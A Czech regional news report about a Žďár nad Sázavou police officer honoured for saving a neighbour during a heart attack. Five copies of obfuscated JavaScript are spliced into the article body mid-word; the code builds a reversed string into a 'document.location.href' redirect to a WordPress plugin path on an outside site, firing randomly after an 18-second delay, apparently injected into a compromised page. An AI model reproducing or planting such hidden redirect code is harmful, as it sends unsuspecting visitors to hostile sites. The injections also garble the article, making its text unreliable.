Rainbow page separator

Policista zachránil život sousedce, kterou postihl infarkt

Pátek, 28. září 2018

Žďár nad Sázavou / Čtyřiatřicetiletého policistu ze žďárského obvodního oddělení Stanislava Sochora ocenil za záchranu života ředitel Krajského ředitelství policie Kraje Vysočina Miloš Trojánek. Policista v srpnu poskytl první pomoc ženě, které se udělalo v jejím bytě špatně.
„Žena měla kolem půl druhé v noci záchvat, dusila se a nemohla dýchat. Vyšla pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na balkon, aby se nadýchala čerstvého vzduchu, ale její stav se rychle zhoršoval. V bytě o poschodí níž právě spal policista Stanislav Sochor, který přes otevřené balkonové dveře uslyšel podezřelé zvuky. Rychle vstal a vyšel na balkon, kde zjistil, že sousedka v bytě nad ním má zdravotní potíže a potřebuje urychleně pomoc,“ uvedla policejní mluvčí Dana Čírtková s tím, že policista volal na sousedku, aby přešla z balkonu ke dveřím a pokusila se mu otevřít. „Utíkal jsem po schodech nahoru k bytu paní sousedky, které se podařilo odemknout mi dveře. Viděl jsem, jak už nemůže popadnout dech, pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to jsem se jí snažil pomoci. Bouchnul jsem ji opakovaně do zad, zvedl jsem ji, aby se mohla nadechnout, a odnesl ji do místnosti, kde jsem ji uložil do stabilizované polohy. Začala lépe dýchat, a já jsem okamžitě volal zdravotnickou záchrannou službu,“ popsal zachránce s tím, že žena měla ještě starost, kdo se postará o jejího psa a o uzamčení bytu. Policista ji přislíbil, že se o všechno postará. Do příjezdu záchranky pak kontroloval její životní funkce a snažil se s ní neustále komunikovat.
Později se ukázalo, že žena prodělala akutní infarkt, takže rychlý zásah policisty jí zachránil život. „Chtěla bych poděkovat panu Stanislavu Sochorovi za záchranu života, kdy jeho pomoc a okamžité jednání vedlo k [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomu, že jsem stále mezi živými. Ve svém volném čase a mimo službu jednal napros[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to profesionálně,“ napsala žena v děkovném dopise, jenž adresovala žďárskému policejnímu územního odboru. „Ten[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to příběh dokládá, že máme mezi sebou kolegy, kteří dokáží v pravou chvíli adekvátně zareagovat na vzniklou situaci a není jim lhostejné, co se děje v jejich okolí, i když zrovna nejsou ve službě. Profesionální počínání kolegy při záchraně života může být příkladem pro ostatní a právem si zaslouží poděkování a uznání,“ doplnil Miloš Trojánek.